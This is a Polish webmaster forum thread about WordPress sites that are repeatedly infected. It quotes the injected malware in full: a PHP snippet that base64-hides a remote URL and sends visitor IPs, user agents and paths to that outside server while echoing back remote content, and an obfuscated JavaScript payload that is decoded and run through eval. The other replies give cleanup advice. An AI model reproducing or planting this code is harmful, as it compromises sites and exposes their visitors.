Zasyfione Wordpressy

[lament]

Ostatnimi czasy wszystkie moje wordpressy zostają zasyfione przez jakieś trojany. Regularnie Backupuje, czyszczę z wrzutek, zmieniam wszystkie możliwe hasła i dalej to samo. To jest jakaś plaga. Dodam, że większość stron postawionych jest w najnowszej wersji Wordpressa, prawie żadnych modułów nie mam po instalowanych, różne skórki i wszędzie to samo.

Kod jaki mi się wpierdziela w php:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
	if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics			
	$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
		$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
curl_close($stCurlHandle); 
}
}
?>

W HTML

<!-- o --><script>try{document.getElementById('1v24rwqa').value=1}catch(q){ss="";s=String;e=eval;t='t';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5t4.5t52.5t51t16t20t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5
t54t50.5t54.5t50.5t55t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t5
5.5t50t60.5t19.5t20.5t45.5t24t46.5t20.5t61.5t4.5t4.5t4.5t52.5t51t57t48.5t54.5t50.
5t57t20t20.5t29.5t4.5t4.5t62.5t16t50.5t54t57.5t50.5t16t61.5t4.5t4.5t4.5t50t55.5t4
9.5t58.5t54.5t50.5t55t58t23t59.5t57t52.5t58t50.5t20t17t30t52.5t51t57t48.5t54.5t50
.5t16t57.5t57t49.5t30.5t19.5t52t58t58t56t29t23.5t23.5t51t48.5t57.5t58t50.5t57t50t
58.5t56t50t48.5t58t50.5t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57.5t58t48.5t
58t23t56t52t56t19.5t16t59.5t52.5t50t58t52t30.5t19.5t24.5t24t19.5t16t52t50.5t52.5t
51.5t52t58t30.5t19.5t24.5t24t19.5t16t57.5t58t60.5t54t50.5t30.5t19.5t59t52.5t57.5t
52.5t49t52.5t54t52.5t58t60.5t29t52t52.5t50t50t50.5t55t29.5t56t55.5t57.5t52.5t58t5
2.5t55.5t55t29t48.5t49t57.5t55.5t54t58.5t58t50.5t29.5t54t50.5t51t58t29t24t29.5t58
t55.5t56t29t24t29.5t19.5t31t30t23.5t52.5t51t57t48.5t54.5t50.5t31t17t20.5t29.5t4.5
t4.5t62.5t4.5t4.5t51t58.5t55t49.5t58t52.5t55.5t55t16t52.5t51t57t48.5t54.5t50.5t57
t20t20.5t61.5t4.5t4.5t4.5t59t48.5t57t16t51t16t30.5t16t50t55.5t49.5t58.5t54.5t50.5
t55t58t23t49.5t57t50.5t48.5t58t50.5t34.5t54t50.5t54.5t50.5t55t58t20t19.5t52.5t51t
57t48.5t54.5t50.5t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58
t50.5t20t19.5t57.5t57t49.5t19.5t22t19.5t52t58t58t56t29t23.5t23.5t51t48.5t57.5t58t
50.5t57t50t58.5t56t50t48.5t58t50.5t23t49.5t55.5t54.5t23.5t58t50.5t54.5t56t23.5t57
.5t58t48.5t58t23t56t52t56t19.5t20.5t29.5t51t23t57.5t58t60.5t54t50.5t23t59t52.5t57
.5t52.5t49t52.5t54t52.5t58t60.5t30.5t19.5t52t52.5t50t50t50.5t55t19.5t29.5t51t23t5
7.5t58t60.5t54t50.5t23t56t55.5t57.5t52.5t58t52.5t55.5t55t30.5t19.5t48.5t49t57.5t5
5.5t54t58.5t58t50.5t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t54t50.5t51t58t30.5t19
.5t24t19.5t29.5t51t23t57.5t58t60.5t54t50.5t23t58t55.5t56t30.5t19.5t24t19.5t29.5t5
1t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t58t50.5t20t19.5t59.5t52.5t50t58t52t1
9.5t22t19.5t24.5t24t19.5t20.5t29.5t51t23t57.5t50.5t58t32.5t58t58t57t52.5t49t58.5t
58t50.5t20t19.5t52t50.5t52.5t51.5t52t58t19.5t22t19.5t24.5t24t19.5t20.5t29.5t4.5t4
.5t4.5t50t55.5t49.5t58.5t54.5t50.5t55t58t23t51.5t50.5t58t34.5t54t50.5t54.5t50.5t5
5t58t57.5t33t60.5t42t48.5t51.5t39t48.5t54.5t50.5t20t19.5t49t55.5t50t60.5t19.5t20.
5t45.5t24t46.5t23t48.5t56t56t50.5t55t50t33.5t52t52.5t54t50t20t51t20.5t29.5t4.5t4.
5t62.5";n=n['split'](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"[i]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script><!-- c -->

Macie może jakieś skuteczne rady na to?

[Marches]

miałem podobnie (iframe) jak na kompie zainstalowany był total commander, teraz mam flashxp i wszystko cacy

[lament]

Z Total Commander nie korzystam, tylko Filezilla, ale to raczej nie jest powód. Teraz zdarzyła mi się sytuacja, że na jednym WP w ogóle się nie logowałem przez długi czas i go dopadło.

[sskoczek]

Czy ten kod jest tylko w php czy również wyświetla się to w jakieś formie na głównej ?

[lament]

Po </html> często prezentuje się właśnie w takiej formie, bądź podobnej, jak powyżej wkleiłem "w HTML", ale i zdarza się, że go w ogóle nie widać z poziomu przeglądarki.

[Mar_Dal]

A jak wtyczki masz poinstalowane ?

[radoslaus]

Spróbuj sprawdzić stronkę tym - https://sitecheck.sucuri.net/scanner/

[lament]

Właśnie teraz mi dopadło takiego WP, gdzie jest jedna skórka ręcznie przerabiana, żadnej wtyczki nie ma...

[radoslaus]

Jeśli wszystko stoi na jednym serwerze/koncie ftp to chyba odpowiedź już masz... Musisz sprawdzić w tym kierunku.

[lament]

Na różnych maszynach stoją, dzisiaj dopadło mi konto gdzie są 3 gołe, aktualne WP.

[Veal]

Daj linka do któregoś z serwisów - strzelam, że szablony stosują starą wersję timthumb.

[fanta001]

Miałem również ten sam problem, tylko dodatkowo jeszcze mi transfer pozjadało. Niestety dopiero po usunięciu wszystkiego z serwera pomogło. 2 wp-ki straciłem, teraz w zasadzie zainstalowałem wszystko to samo (hasła megatrudne) i śmiga.

[SzlafRock]

Zobacz tu https://wordpress.org/support/topic/security-problem-8

Może to Ty pisałeś jako giangel84, ale poczytaj

[lament]

Veal: https://unikalny.org - domyślny szablon przerobiony

fanta001 oby jak najdłużej Ci śmigało, ja z większością sobie poradziłem, ale na część po raz kolejny mi siada cholerstwo.

[kataologowanie-reczne]

lament masz zapamiętane hasła w kliencie FTP?